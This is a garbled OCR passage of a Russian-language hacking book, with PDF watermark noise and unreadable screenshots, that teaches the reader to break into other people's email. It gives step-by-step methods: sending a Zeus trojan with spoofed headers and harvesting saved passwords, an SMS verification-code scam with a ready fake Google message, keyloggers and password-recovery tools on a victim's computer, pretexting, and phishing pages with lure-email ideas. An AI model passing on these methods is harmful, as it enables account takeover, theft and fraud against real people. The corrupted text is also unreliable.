Добавил:
Опубликованный материал нарушает ваши авторские права? Сообщите нам.
Вуз: Предмет: Файл:

книги хакеры / Что такое хакинг

.pdf
Скачиваний:
20
Добавлен:
19.04.2024
Размер:
30.29 Mб
Скачать

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

 

F

 

 

 

 

 

 

 

t

 

 

 

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

 

r

 

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

w Click

 

 

 

 

 

 

 

 

 

 

 

 

g

 

 

m

virustotal

w

 

 

 

 

 

 

 

 

o

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

 

.c

 

 

 

 

 

p

df

 

 

n

e

 

 

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

SНА256

7e9aS2f9Ьd9ed519Ь87d54-19cc.d97d9927faaecet2ЬЭ04•ыo.t.ь.4Ь62a786fO

 

 

 

 

 

 

 

 

 

 

 

 

Flle name:

Gtxv2_0.e:xe

 

 

 

 

 

 

 

 

 

 

 

 

Oetltd.1on ratю

О / 55

 

 

 

 

 

 

 

 

 

 

 

 

Amtlysis date

201s-,0--2912 50:40UТС ( 6 minutes ago)

Anafysia

Х: Ralatl0'15h1ps

О AddJtiOf'lal mfn..nнrt1on

Comme s. О

Q Voies

 

 

R-ult

 

Update

 

 

..

 

20151029

AVG

 

..

 

20151029

AVwate

 

 

 

20151029

 

 

..

 

20151029

 

 

о

 

20151029

 

 

"'

 

20151028

Mnl.aЬ·VЗ

 

..

 

20151029

Аliьаь..

 

..

 

20151029

Antry-AVI..

 

..

 

20151029

AlcaЬit

 

..

 

20151029

 

 

..

 

20151029

Рис. 3.1. Отчет V,rusTotal

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

Когда троян создан, осталось самое малое - написать жертве письмо, в ко­ тором нужно мотивировать ее запустить троян. Здесь нужно проявить изо­ бретательность. Конкретных рекомендаций быть не может, все зависит от «жертвы». Например, бухгалтеру можно отправить какое-то обновление бухгалтерской программы, ты, конечно, знаешь, какая программа использу­ ется и заказаны ли обновления к ней. Иначе (если обновления не заказаны), такое письмо (даже от имени якобы разработчиков программы) вызовет по­ дозрения.

Чтобы поле From содержало внушительное название, а не xaker134566788@ gmail.com, были подделаны заголовки письма. Это делается довольно про­ сто, а как именно будет показано в способе 5. Пока не будем на это отвле­ каться.

После установки трояна на компьютер жертвы он окажется полностью в твоей власти (рис. 3.2).

Что мы можем? Мы можем ради интереса просмотреть список процессов компьютера, в котором, ясное дело, не будет нашего трояна (рис. 3.3)..Мы

можем просмотреть файловую систему (рис. 3.4).

. . . . . .. . .. . . . . . . . . . . . . . .. . .. . ..... . . . . . . . . . . . . . . . . . . . . .. . . . . . . ... . . . .. . . . . . . . .. .. .

Файловая система на компьютере :жертвы
19.Q.l.ZOlll.Z.1 1a.oLI01311:S3,;.!19 '.!Z..S.201J1010>tJ 19.02.2.CIIZ:U,.12 • 19.0l-2012ll:1f:OO 1■.oz.i.»22.2,2•""' 19 12.U:.IS:2:9
.tl.ol.201Zl2.-:ZJ 0..10.201.31 1s,и 1701.ЮН17-ОО,ОЭ lS.Ql.2Cl1•H:.!7cCJ l:t.o..t-201•11-"'4101216.'(1<131 1 1 .102.20'122);&8:18 21.02.2.012. 1:t •l:36 OS.OJ.2013 IP:20'..27 18.o3.201S1J.<1S>U 17.01.2.012.l t0:11 П.ol..201l1<1::J<l,Z6 0).ol..!01<111:211:<18 11.0,.201111-ooitJr 11'.02.2012.1512:2.5 19.l!l.2012UM:Я 17.01.20)21<1:211:51
..,.
..,.
...,
..,.
..,
.,.

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

 

 

 

o

 

 

 

 

:\NOW!а1.:11111 11а 111m,1L·pa\

 

 

 

 

 

 

 

 

 

to

BUY

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

са.,,. 11) -

..а,..;-s.м, Ьуs........

З2-еr-о«с 18с

□"""""---... s, =....,_

................

' 1'1r. М, Os,,,,t•mUf>I,,...,

...,l'Cu............,.....

us-.n.m.:

--

а

•=__...... "Т)-р,о,

'}"' r;,....,,.otot"CounL,...,_

.-Download,..,.....,...,..,­

.1.ANAddnй,

!J1'.!ШХ•:.-- - -

IOfl8Г-!-Ot5J 9:-'5.uA 2e.,o.m1S 11.26'.IS

"""•- l' r..ьon

мiиощll Ww,,do..,. XJ> ,ro!••"""'-'

'n1'7'TTt7,tn,rrrn

t,ЦIJ, f;r--": ,..,,.

Oo.,<•J7нo..r-.2J>.wwt•• ,vuu,a.

....чю---..оu•иоuJ.ооонr. IN.fl[") GJJJC»• •11 c,,ips« f-.iy

==

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

Рис. 3.2. Управление компьютером жертвы посредством Zeus

Pнкu•- 0googil8dr..,,.

r:::IA'dкt"R

□-­ □.-u

L З wwJ2

□ .. □-•

Qi:,oogteCWНil,ync С)с,урtоо,,"5..,,.;и

c=i-­1N1

r.:!ovn..ooк

□,•......,._,

01\'CfW>R

□-• □,-

.,ipk,,..­

O;gtnnoc

01vcn.cn1 a....,w

□ ,

о,.....

 

 

CVR>9r..,,iм1\Go o,oog,18dtir,кync.•п

 

 

C..'\--«:IOWS\ ...-J2\•-R­

 

 

\tf\C..'\WINDOWS\l7"l1tm:Jl\ .1t"1t

 

 

C:\WIN0 .,..,1\IVd\011•....,

 

 

:;,.,..,,,;,;.......;;;;;;;;;;,,;,,.,====-::- '...J=

 

 

C\h09'.... ,••,,.-.-uv_..-J2..,,.

NI,.

 

r..,,..,.r , -•

 

 

 

"Yt1!>•-"• 1<>Pt08-II"•• C.'\hos,,-, f"-S\1,:,,U\8.2 19,121 ,Щlcv8A,,.

н:1,,

 

С\ °"".,,, r• 90<>0"- •"'"

N/A

 

c-,rogr_. -•\C)'t><l<s.f• Тор k(r,rt Z\,C,ypto,Otitser,,o:. .,..

,.•

ям

:::::::=:=:::- •1-0\C)UftQOr;,EXE

C'\Pf<>91-,fileS\t т.....v-.,....

...,.

 

C'\-..OOW$Uy1tнn)l\l;'<Cn0 1t•1t

c...__.-м,,-\lf1t,t,_ E'll.plo, •--­ C..'\l'n>g,r.... HS\1c,4l\l.:!.1f121\tltn',,t .•"'"

C:'1.W..OOWS\El<plor".EXE C:'I.WINDOWS\фt•mJl\lgtxvw •"•

C'\,WINOO\NS\J;y•l•MU'\fv<jho-Q

C.."\-.oows\. •mi..."\l,pcl-"• \"1\C:\W\NOOWS\•t•l•n'l)X\ o .,..

C'\.W!NOOWS\S)'J1•m я ...

C'i\•rog,---,,iieo\lflf•,_ Ьplor• l..,..,8,.. С!\ ,и,,..,,.

1 !

c..v,og,,-,- dt'J'f'()art_-­ C.V,og,am, -

Рис. 3.3. Список процессов на компьютере жертвы (конфиденциш ьная инфор­ мация по понятным причинам закрашена)

.::::ovt WW е,рьь+

f'4o8N8nw

S<le

 

 

Тур",8

 

IV\I08ANI(

 

I0.03.2(tl2.H:11:o9

""'37И72

 

la.ЧJ...20\S IJ:;Н,:1,C

к•ттс7r<JП99с211<1

 

2.8.10.201S1L'26.1S

 

12-02-201<111'- J

C...t.l...RecyCМ•"'

Fokмr

 

 

 

:...ь«и.ь., ,

......

 

t..ЬQ",hЬ--""89"М1'0VO

·-

 

"°"'-'

 

 

Uii■!.Clnt__.1.2

 

 

-•sa,,.,..1 •·••pe,,,,o,II•-- ,o1c1er

с.а, l:..Confi9.МI•

t.l;Ooaomenu.,.., s.nw,g•

:..,.о,w"ьм

YiDl'WeOO..-- c_.,НP..,,_......F,dO,.,,.,

olck,

Folder

..,,,•s;,01 mVolumelnf<>m\et>of>

Рис. 3.4.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - .

 

 

 

hang

e

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

C

 

E

 

 

 

 

C

 

E

 

 

 

X

 

 

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

-

 

 

 

 

 

d

 

F

 

 

 

 

 

 

 

t

 

F

 

 

 

 

 

 

 

t

 

D

 

 

 

 

 

 

 

i

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

 

r

P

 

 

 

 

NOW!

o

P

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

BUY

 

 

 

 

to

 

 

 

 

 

 

 

 

to

 

 

 

 

 

 

wClick

 

Конечноo m

 

 

 

 

 

 

 

 

o m

 

 

 

, самое главное, ради чего все это затевалось - список паролей,wсоClick­

 

 

 

 

 

w

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

.c

w

 

 

 

 

 

 

.c

 

.

 

 

 

 

 

 

 

.

 

 

 

 

 

 

 

p

 

 

 

храненных в браузере (рис. 3.5). Среди этих паролей был сохранен пароль к

 

 

g

 

 

 

 

 

 

 

g

 

 

 

p

 

 

 

 

 

 

 

 

df

 

 

n

e

 

 

df

 

 

n

e

 

 

 

-xcha

 

 

 

 

 

 

 

-x cha

 

 

 

 

 

 

 

 

 

почте Gmail (см. рис. 3.5) - цель достигнута, мы получили доступ к почто­

 

 

 

 

 

 

 

 

 

 

 

вому ящику!

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

rfi,:::.=:-. •9ь7.:;. .ervteeto,.,......

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

,

,.,.- -- ,m ,кщ, ,оw"-

 

 

 

 

 

 

 

 

 

.,-hЩIW/ч> ritn--•b.n,/\o hp t,цpo;//Wt...,,.,.90-offk•.,цl

r.,.ht'lps.:J/8-mCA.,w,..,..,.,...Mavm

--:hne:!l' o -

w'""-5c,"" Cl""ticro1ol\ X,_tn,oon.i

Рис. 3.5. А вот и пароли

Приведенный способ - только один из многих подобных. Существуют раз­ ные трояны. Некоторые не имеют рассмотренной только что панели управ­ ления, а просто сохраняют интересующую вас информацию в текстовый файл и передают по e-mail на ваш почтовый ящик.

3.2. Взлом по номеру телефона

Суть этого способа заключается в следующем. Злоумышленнику нужно знать номер телефона жертвы, указанный при регистрации почтового ящи­ ка. При сбросе пароля почтовая служба требует ввести последние символы номера телефона (или выбрать номер телефона из списка). На этот номер бу­ дет отправлено SMS с кодом подтверждения сброса пароля. Затем злоумыш­ ленник отправляет второе SMS с требованием указать код из предыдущего SMS. Пользователь, ничего не подозревая, отправляет код из первой SMS. Самый большой недостаток этого способа в том, что первая SMS придет от Google, а вторая - с неизвестного номера. Успех этого способа зависит от со­

образительнос и жертвы. ....

. - -- - - - - - --- - - - -- - - -- - - - - - - - - - - - -- - - - - - -- - - --·- --·- - - - - -- - - - - -- - - -- - -- - - - - - - - -- - -

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

Последовательностьm

действий такая:

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

Нужно попытаться выполнить вход в аккаунт Google жертвы.

 

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

Поскольку пароль мы не знаем, Google предложит нам его восстановить.

Далее если у предполагаемой жертвы был привязан к аккаунту Android­ тeлeфoн, то Google предложит отправить оповещение на мобильный. Примечательно, но смартфон не издал ни единого звука, а просто ото­ бразил оповещение. Если ofl не будет перед глазами у пользователя, есть вероятность, что он его не заметит. Если же пользователь нажмет Нет, то

е отчаивайся - повторите данный процесснесколько раз - позже поймете зачем.

После отправки оповещения появится страница с инструкциями, внизу будет ссылка на классическую страницу сброса пароля по SMS. Отправь­ те SMS жертве.

Жертва получит SMS через несколько секунд. С другого телефона от­ правь примерно такое сообщение:

Предотвращена попытка входа в аккаунт Google. -Перешлите код подтверждения Google для ра блокировки аккаунта.

Далее все зависит от смекалки пользователя. С одной стороны, пользова­ тель может обратить внимание на неизвестный номер. С другой стороны, поставь себя на место среднестатистического пользователя. Сначала он по­ лучает уведомление о сбросе пароля, потом SMS с кодом подтверждения, а после - сообщение о том, что замечена подозрительная активность. Конечно, можно все немного усложнить и завести короткий номер, с которого и будет отправлена SMS. Получить короткий номер с названием службы, например, GSecurity, не проблема. Это только повысит вероятность успеха.

Получение доступа к почтовому ящику - это еще не все. Чтобы жертва не до­ гадалась, что ее ящик увели, после сброса пароля нужно создать временный пароль и отправить его по SMS, а самим тем временем сделать переадреса­ цию на «хакерский)) ящик. Так можно получить контроль над ящиком, не вызвав особых подозрений.

Данный способ довольно стар и с успехом используется различными «спе­ циалистами)). О нем даже писали в официальном блоге компании Symantec, при-желании можно просмотреть его в действии:

- - - - - - - - - - - - - - - - - -- - - - - - - --- ---- - - - - - - - ----- - - - - - - - - -- - --- - - - -- - - - - - - - - - - - - - - - - - - .

- - - -

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

 

t

 

 

F

 

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

 

i

 

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

 

 

to

 

 

 

 

 

 

w Click

 

http://www.symantec.com/connect/m

Ьlogs/password-recovery-scam-tricks-users­w Click

 

 

 

 

 

 

m

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

o

 

 

w

 

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

 

.c

 

 

.

 

 

 

 

 

 

.c

 

 

 

p

 

 

 

handing-over-email-account-access

 

 

p

 

 

 

 

g

 

 

 

 

 

 

 

 

 

g

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

-x cha

 

 

 

 

 

Как говорится, лучше один раз увидеть, чем сто раз услышать.

3.3. Физический доступ к компьютеру

Если у нас есть доступ к компьютеру жертвы, то можно считать, что почту уже взломали. Хакер может запустить на компьютере или кейлоггер (клави­ атурный шпион) или проrрамму для «восстаноалени,1)) паролей почтовых учетных записей.

Суть кейлоггера в том, что в специальный файл он записывает все, что поль­ зователь вводит с клавиатуры. Тебе останется только второй раз подойти к компьютеру, чтобы забрать результирующий файл (или получить его по почте - есть и такие шпионы).

К преимуществам кейлоггера относится то, что он записывает все подряд. Поэтому кроме паролей можно получить еще много интересной информа­ ции о своей жертве. Но и недостатков у них очень много. Самый существен­ ный - большинство кейлоггеров успешно определяются антивирусами и если на компьютере жертвы устаноален антивирус, использовать кейлоггер не получится. Ведь не всегда есть возможность отключить антивирус.

Второй недостаток вытекает из его достоинства. В результирующий файл помещается много лишней информации. Мало собрать информацию с кла­ виатуры, нужно еще отыскать среди всего лишнего то, что нужно - пароль.

Третий недостаток - если жертва использует почтовый клиент, а не веб­ интерфейс, то кейлоггер вообще не поможет.·Скорее всего, пароль уже вве­ ден в почтовый клиент и запомнен, поэтому жертва не вводит его каждый раз при проверке почты. Следовательно, кейлоггер запишет в файл все, что вводит пользователь, кроме того, что нужно тебе.

Есть и еще один недостаток - ес:Ли выбранный кейлоггер не поддерживает отправку результирующего файла по e-mail, то придется еще один раз под­ ходить к компьютеру. Пример кейлоггера - SniperSpy на случай, если по­ явится желание ним воспользоваться.

Проrраммы для «восстаноаления)) паролей почтовых учетных записей по­ зволяют сразу получить все интересующие вас пароли без необходи....мости чтения мегабайтов текста в поиске нужного вам пароля. К тому же на них

. - -- - ---- - ·-- - - ....-.. ·-.- ....- ---- - - - - ..- - ..- -...- - ... - ....... - - -- - - . - - - -

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

... --

--

--

.

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

 

t

 

 

F

 

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

 

i

 

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

проблема. Если же жертва использует веб-интерфейс для чтения своего по­

 

 

 

 

 

 

m

w Click

 

 

 

 

 

 

 

m

w Click

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

o

 

w

 

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

.c

 

 

.

 

 

 

 

 

 

.c

 

 

 

p

 

 

 

чтового ящика, тогда лучше использовать программу WebBrowserPassView.

 

 

g

 

 

 

 

 

 

 

 

 

g

 

 

 

 

 

p

 

 

 

 

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

-x cha

 

 

 

 

 

Она поддерживает все версии Windows, начиная с 2000 и заканчивая 1О. Ста­ рые версии вроде 98/МЕ не поддерживаются.

Нами была протестирована и эта утилита. Программа успешно восстанови­ ла все пароли, хранящиеся в браузерах IE, Firefox, Chrome и Opera (Safari не проверялся, но, думаю, и там будет полный «порядок»). Даже если ты не найдешь среди этого списка пароль от почтового ящика, сей список будет тоже полезен - ведь люди часто используют одни и те же пароли для разных служб.

Примечание. Программу WebBrowserPassView можно исполь­ зовать и в более мирных целях, например, когда ты забыли свой же пароль, сохраненный в браузере. Собственно, для этого она

и разрабатывалась. С другой стороны, сейчас тот же Chrome и все браузеры, основанные на нем, позволяют просмотреть со­

храненные пароли. Но для этого нужно ввести пароль учетной

записи пользователя, а вот если пароль на вход в систему не

установлен (что часто бывает)...

3.4. Социальная инженерия или просто обман

Об этом способе не писал только ленивый. Много было уже сказано. Тебе кажется, что этот способ не такой эффективный, как о нем говорят? Ты оши­ баешься.

Несколько лет бьша взломана почта директора ЦРУ Джона Бреннана. Аб­ сурдность ситуации в том, что почту взломал не «матерый» хакер, а обыч­ ный подросток, правильно собрав информацию о своей ((Жертве». Подро­ сток сначала связался с сотовым оператором, представившись сотрудником технической поддержки, уточнил детали аккаунта Бреннана.

После этого он позволил в AOL и, представившись Бреннаном, попросил сбросить его пароль. Поскольку он знал всю необходимую информацию (номер почтового аккаунта, последние цифры банковской карты, 4-значный РIN-код, номер телефона), па;роль был сброшен и никто ничего не запо­ дозрил.

Чуть позже Wikileaks опубликовал письма директора ЦРУ4, см. рис. 3 6

. - - .- ............... . ...................

- .. .

- -..- - ....

- ......

-...........

·- - -·.·- ....

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

 

C

 

 

E

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

 

d

 

 

 

 

 

F

 

 

 

 

 

 

 

t

 

 

 

 

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

 

 

r

 

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

 

 

to

 

..

 

 

 

 

 

w Click

 

 

 

 

 

 

m

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

u

 

.

 

 

 

 

 

 

.c

 

 

 

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

The Conundrum of Iran

... ..

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

F

 

 

 

 

 

 

t

 

 

 

D

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

 

P

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

o

 

 

 

 

 

 

 

.c

 

 

 

.

 

 

 

 

 

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

-- ----_ _____ _

 

 

 

 

 

 

 

 

 

 

 

 

-==-==""::' -::==-=--- :...

 

§?E?"iE -E -

 

 

-------·....

-.------

 

 

 

::: .:

 

 

: ·r" ..................., ..... .

 

--

 

 

--

 

 

"'--

''• "

.,.

 

 

--- -... ..

...........

 

 

 

 

 

 

·

- -.. - ....--

.,,,,

 

 

 

 

::.:=.

 

 

 

== :::S:

 

- ....

,..

 

 

ъ ,; ..-

 

...........t..

 

 

 

. ..,...,

....,_

 

 

 

_ ,...

 

 

 

 

 

 

 

 

 

_

 

 

.,_

 

 

. -- i._..

i.

... ..:::::.: - ,:::-

i ___J "8:: -.-i

 

Рис. 3.6. Письма директора ЦРУ, опубликованные Wikileaks

Преимущество этого способа в том, что не нужно обд_адать никакими специ­ альными знаниями и этот способ под силу любому. Успех этого метода зави­ сит от смекалки «нападающего)) - сможет ли он найти нужную информацию или нет.

3.5. Модное слово «фишинr»

Попросим пользователя самого сообщить нам свой пароль. Нет, этот способ не подразумевает физического насилия и ни один из пользователей в резуль­ тате эксперимента не пострадает. Во всяком случае, физически.

Суть этого метода в следующем: нужно создать поддельную версию стра­ ницы авторизации того сервиса, который нужно. Например, если нужно по­ лучить пароль от почты Mail.Ru, тогда нужно создать такую же страницу входа.

Примечание. Пример письма: можешь написать владельцу сай­ та, что на его счету заканчиваются средства, что истекает срок действия домена, что закончилось место на диске хостинга. За­ мани пользователя на свой сайт и ты получишь пароли от досту­ па в панель управления хостингом. Мы не будем брать 10% за идею, считай это приятным бонусом к книге!

···

·················

......

..,

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

Сохранить как в

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

·------------------------------------------------------------------------------------

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

Google

One account. А/1 of Google.

S/gn in ro continue ro Gmail

 

 

 

 

hang

e

 

 

 

